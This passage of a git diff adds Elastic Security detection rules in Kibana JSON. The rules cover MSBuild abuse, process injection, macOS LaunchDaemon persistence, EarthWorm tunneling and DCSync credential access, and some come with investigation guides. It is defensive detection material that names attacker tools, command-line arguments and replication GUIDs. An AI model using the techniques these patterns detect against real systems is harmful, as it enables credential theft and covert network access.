}, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.002", + "name": "Security Account Manager", + "reference": "https://attack.mitre.org/techniques/T1003/002/" + } + ] + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/", + "subtechnique": [ + { + "id": "T1555.004", + "name": "Windows Credential Manager", + "reference": "https://attack.mitre.org/techniques/T1555/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 109 + }, + "id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_210.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_210.json new file mode 100644 index 00000000000..952442a24a6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_210.json @@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An instance of MSBuild, the Microsoft Build Engine, started a PowerShell script or the Visual C# Command Line Compiler. This technique is sometimes used to deploy a malicious payload using the Build Engine.", + "false_positives": [ + "The Build Engine is commonly used by Windows developers but use by non-engineers is unusual. If a build system triggers this rule it can be exempted by process, user or host name." + ], + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "logs-system.security*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft Build Engine Started an Unusual Process", + "new_terms_fields": [ + "host.id", + "user.name" + ], + "query": "host.os.type:windows and event.category:process and event.type:start and process.parent.name:(\"MSBuild.exe\" or \"msbuild.exe\") and\nprocess.name:(\"csc.exe\" or \"iexplore.exe\" or \"powershell.exe\")\n", + "references": [ + "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/", + "subtechnique": [ + { + "id": "T1027.004", + "name": "Compile After Delivery", + "reference": "https://attack.mitre.org/techniques/T1027/004/" + } + ] + }, + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 210 + }, + "id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_210", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_211.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_211.json new file mode 100644 index 00000000000..d97aba7b05c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_211.json @@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An instance of MSBuild, the Microsoft Build Engine, started a PowerShell script or the Visual C# Command Line Compiler. This technique is sometimes used to deploy a malicious payload using the Build Engine.", + "false_positives": [ + "The Build Engine is commonly used by Windows developers but use by non-engineers is unusual. If a build system triggers this rule it can be exempted by process, user or host name." + ], + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "logs-system.security*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft Build Engine Started an Unusual Process", + "new_terms_fields": [ + "host.id", + "user.name" + ], + "query": "host.os.type:windows and event.category:process and event.type:start and process.parent.name:(\"MSBuild.exe\" or \"msbuild.exe\") and\nprocess.name:(\"csc.exe\" or \"iexplore.exe\" or \"powershell.exe\")\n", + "references": [ + "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/", + "subtechnique": [ + { + "id": "T1027.004", + "name": "Compile After Delivery", + "reference": "https://attack.mitre.org/techniques/T1027/004/" + } + ] + }, + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 211 + }, + "id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_211", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_106.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_106.json new file mode 100644 index 00000000000..b536aa83afa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_106.json @@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An instance of MSBuild, the Microsoft Build Engine, created a thread in another process. This technique is sometimes used to evade detection or elevate privileges.", + "false_positives": [ + "The Build Engine is commonly used by Windows developers but use by non-engineers is unusual." + ], + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Process Injection by the Microsoft Build Engine", + "query": "process.name:MSBuild.exe and host.os.type:windows and event.action:\"CreateRemoteThread detected (rule: CreateRemoteThread)\"\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + }, + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_106.json b/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_106.json new file mode 100644 index 00000000000..f7c2115d571 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_106.json @@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Indicates the creation or modification of a launch daemon, which adversaries may use to repeatedly execute malicious payloads as part of persistence.", + "false_positives": [ + "Trusted applications persisting via LaunchDaemons" + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "LaunchDaemon Creation or Modification and Immediate Loading", + "query": "sequence by host.id with maxspan=1m\n [file where host.os.type == \"macos\" and event.type != \"deletion\" and file.path : (\"/System/Library/LaunchDaemons/*\", \"/Library/LaunchDaemons/*\")]\n [process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and process.name == \"launchctl\" and process.args == \"load\"]\n", + "references": [ + "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9d19ece6-c20e-481a-90c5-ccca596537de", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "9d19ece6-c20e-481a-90c5-ccca596537de_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_110.json b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_110.json new file mode 100644 index 00000000000..00fa2794882 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_110.json @@ -0,0 +1,80 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of the EarthWorm tunneler. Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection and network filtering, or to enable access to otherwise unreachable systems.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Protocol Tunneling via EarthWorm", + "note": "## Triage and analysis\n\n### Investigating Potential Protocol Tunneling via EarthWorm\n\nAttackers can leverage `earthworm` to clandestinely tunnel network communications and evade security measures, potentially gaining unauthorized access to sensitive systems.\n\nThis rule looks for several command line arguments that are consistent with `earthworm` tunneling behavior. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate protocol tunneling. This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- Potential Protocol Tunneling via Chisel Client - 3f12325a-4cc6-410b-8d4c-9fbbeb744cfd\n- Potential Protocol Tunneling via Chisel Server - ac8805f6-1e08-406c-962e-3937057fa86f\n- Potential Linux Tunneling and/or Port Forwarding - 6ee947e9-de7e-4281-a55d-09289bdf947e\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator or developer who uses port tunneling for benign purposes, consider adding exceptions for specific user accounts or hosts. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n process.args : \"-s\" and process.args : \"-d\" and process.args : \"rssocks\"\n", + "references": [ + "http://rootkiter.com/EarthWorm/", + "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9f1c4ca3-44b5-481d-ba42-32dc215a2769", + "setup": "## Setup\n\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "9f1c4ca3-44b5-481d-ba42-32dc215a2769_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_112.json b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_112.json new file mode 100644 index 00000000000..2cc40d9b651 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_112.json @@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule identifies when a User Account starts the Active Directory Replication Process. Attackers can use the DCSync technique to get credential information of individual accounts or the entire domain, thus compromising the entire domain.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Credential Access via DCSync", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via DCSync\n\nActive Directory replication is the process by which the changes that originate on one domain controller are automatically transferred to other domain controllers that store the same data.\n\nActive Directory data consists of objects that have properties, or attributes. Each object is an instance of an object class, and object classes and their respective attributes are defined in the Active Directory schema. Objects are defined by the values of their attributes, and changes to attribute values must be transferred from the domain controller on which they occur to every other domain controller that stores a replica of an affected object.\n\nAdversaries can use the DCSync technique that uses Windows Domain Controller's API to simulate the replication process from a remote domain controller, compromising major credential material such as the Kerberos krbtgt keys used legitimately for tickets creation, but also tickets forging by attackers. This attack requires some extended privileges to succeed (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which are granted by default to members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups. Privileged accounts can be abused to grant controlled objects the right to DCsync/Replicate.\n\nMore details can be found on [Threat Hunter Playbook](https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing) and [The Hacker Recipes](https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync).\n\nThis rule monitors for Event ID 4662 (Operation was performed on an Active Directory object) and identifies events that use the access mask 0x100 (Control Access) and properties that contain at least one of the following or their equivalent Schema-Id-GUID (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, DS-Replication-Get-Changes-In-Filtered-Set). It also filters out events that use computer accounts and also Azure AD Connect MSOL accounts (more details [here](https://techcommunity.microsoft.com/t5/microsoft-defender-for-identity/ad-connect-msol-user-suspected-dcsync-attack/m-p/788028)).\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Correlate security events 4662 and 4624 (Logon Type 3) by their Logon ID (`winlog.logon.id`) on the Domain Controller (DC) that received the replication request. This will tell you where the AD replication request came from, and if it came from another DC or not.\n- Scope which credentials were compromised (for example, whether all accounts were replicated or specific ones).\n\n### False positive analysis\n\n- Administrators may use custom accounts on Azure AD Connect, investigate if it is the case, and if it is properly secured. If noisy in your environment due to expected activity, consider adding the corresponding account as a exception.\n- Although replicating Active Directory (AD) data to non-Domain Controllers is not a common practice and is generally not recommended from a security perspective, some software vendors may require it for their products to function correctly. If this rule is noisy in your environment due to expected activity, consider adding the corresponding account as a exception.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Investigate how the attacker escalated privileges and identify systems they used to conduct lateral movement. Use this information to determine ways the attacker could regain access to the environment.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "query": "any where event.action : (\"Directory Service Access\", \"object-operation-performed\") and\n event.code == \"4662\" and winlog.event_data.Properties : (\n\n /* Control Access Rights/Permissions Symbol */\n\n \"*DS-Replication-Get-Changes*\",\n \"*DS-Replication-Get-Changes-All*\",\n \"*DS-Replication-Get-Changes-In-Filtered-Set*\",\n\n /* Identifying GUID used in ACE */\n\n \"*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2*\",\n \"*1131f6aa-9c07-11d1-f79f-00c04fc2dcd2*\",\n \"*89e95b76-444d-4c62-991a-0facbeda640c*\")\n\n /* The right to perform an operation controlled by an extended access right. */\n\n and winlog.event_data.AccessMask : \"0x100\" and\n not winlog.event_data.SubjectUserName : (\n \"*$\", \"MSOL_*\", \"OpenDNS_Connector\", \"adconnect\", \"SyncADConnect\",\n \"SyncADConnectCM\", \"aadsync\", \"svcAzureADSync\", \"-\"\n )\n\n /* The Umbrella AD Connector uses the OpenDNS_Connector account to perform replication */\n", + "references": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html", + "https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing", + "https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/security/win_ad_replication_non_machine_account.yml", + 